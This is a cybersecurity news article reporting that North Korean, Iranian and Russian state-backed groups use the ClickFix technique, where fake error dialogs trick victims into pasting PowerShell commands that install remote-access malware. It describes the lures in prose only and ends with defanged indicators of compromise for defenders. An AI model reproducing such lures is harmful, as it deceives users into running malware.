Cyber Security News

State Sponsored Hackers now Widely Using ClickFix Attack Technique in Espionage Campaigns

The state-sponsored hackers from North Korea, Iran, and Russia have begunp deploying the ClickFix social engineering technique, traditionally associated with cybercriminal activities, into their espionage operations.

This shift was first documented by Proofpoint researchers over a three-month period from late 2024 into early 2025 where these actors employed ClickFix in routine activities.

The Emergence of ClickFix

ClickFix, a creative method that utilizes dialogue boxes to coax victims into copying, pasting, and running malicious commands, has emerged as a significant tool in the cyber arsenal of state-sponsored groups.

The technique disguises itself with authoritative alerts from the operating system, guiding the user through a series of fake error resolutions that ultimately lead to the execution of harmful scripts.

Initially observed in global cybercrime landscapes in early 2024, it is now making its mark in espionage campaigns.

North Korean actor TA427, also known as Kimsuky or Emerald Sleet, was observed utilizing ClickFix in their infection chain.

ClickFix AttackClickFix Attack
TA427 ClickFix infection chains (chain 1 – solid line; chain 2 – dotted line).

Targeting think tanks involved in North Korean affairs, TA427 initiated contact through spoofed meeting requests from diplomats, leading the targets into a trap where they were tricked into running a PowerShell command.

This command fetched and executed additional scripts, culminating in the installation of QuasarRAT, a malware known for its use in cybercriminal activities.

Iranian Cyber Operations

Iran’s TA450, or MuddyWater, targeted 39 organizations across the Middle East with an English-language phishing campaign.

Masquerading as a security update from Microsoft, the attackers used ClickFix to deploy remote management and monitoring (RMM) software.

This allowed TA450 operators to conduct espionage and data exfiltration, marking the first instance of this group using the Level RMM tool around November 2024.

Russian-linked groups, including UNK_RemoteRogue and TA422 (also known as Sofacy or APT28), have also tested ClickFix.

Decoy lure Questionnaire.pdf.

According to the Report, UNK_RemoteRogue sent targeted messages to defense sector entities, directing them to a malware-laden web page.

TA422, in a separate campaign, used a Google spreadsheet mimic to execute PowerShell commands, establishing SSH tunnels and deploying Metasploit.

This increased adoption of ClickFix underscores the fluidity of cyber tactics, where innovative criminal strategies are rapidly assimilated into state-backed cyber operations, challenging cybersecurity professionals to adapt to an ever-evolving threat landscape.

Indicators of Compromise (IoC)

To help protect against such threats, here are some key indicators associated with these campaigns:

TypeDescriptionFirst Seen
Email addressyasuyuki.ebata21@proton[.]meFebruary 2025
Email addresseunsoolim29@gmail[.]comJanuary 2025
IP115.92.4[.]123 (likely compromised)January 2025
Domainsecuredrive.networkguru[.]comJanuary 2025
URLhxxps://securedrive.fin-tech[.]com/docs/en/January 2025
SHA25606816634fb019b6ed276d36f414f3b36f99b845ddd1015c2b84a34e0b8d7f083 (Letter from Ambassador Cho Hyun-Dong.pdf)January 2025
SHA2560ff9c4bba39d6f363b9efdfa6b54127925b8c606ecef83a716a97576e288f6dd (temp.vbs)January 2025

Find this News Interesting! Follow us on Google NewsLinkedIn, & X to Get Instant Updates!

Aman Mishra

Aman Mishra is a Security and privacy Reporter covering various data breach, cyber crime, malware, & vulnerability.

Recent Posts

Fedora Linux Joins the Windows Subsystem for Linux Officially

Fedora Project has announced the official availability of Fedora Linux on the Windows Subsystem for…

23 minutes ago

Microsoft Launches “Copilot+ PC” for an Upgraded Windows Experience

Microsoft has announced a significant wave of new Windows experiences designed for Copilot+ PCs, which…

27 minutes ago

Nomad Bridge Hacker Apprehended in Connection with $190 Million Heist

Alexander Gurevich, a 47-year-old dual Russian-Israeli citizen, was arrested last Thursday at Ben-Gurion Airport while…

35 minutes ago

160-Year-Old Haulage Firm Falls After Cyber-Attack: Director Issues Urgent Warning

The 160-year-old haulage giant Knights of Old, once a stalwart of the UK’s logistics sector,…

40 minutes ago

SonicWall Unveils New Firewalls and Comprehensive Managed Cybersecurity Service

SonicWall has unveiled a new line of advanced firewalls and a comprehensive managed cybersecurity service…

45 minutes ago

China-Backed Hackers Target Exiled Uyghur Community with Malicious Software

Senior members of the World Uyghur Congress (WUC) living in exile were targeted with a…

49 minutes ago